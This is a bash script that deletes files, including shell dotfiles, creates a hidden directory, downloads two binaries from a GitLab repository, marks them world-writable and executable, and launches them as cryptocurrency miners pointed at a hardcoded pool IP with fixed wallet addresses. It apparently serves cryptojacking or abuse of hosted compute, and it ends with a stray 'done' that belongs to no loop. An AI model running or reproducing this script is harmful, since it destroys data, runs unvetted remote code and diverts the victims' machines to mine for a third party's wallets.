#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u up6wFaDx2cQexHM8VvvRhAFdcDNMESVpbZ.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.81
chmod 777 lol1.81

./lol1.81 -a PYRIN -p 138.197.98.18:80 -u pyrin:qrz6n9aa9595ms5yx36jpmrczh4q50leyrqw833a5pg9kqcey94qz9vl5jvu4.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
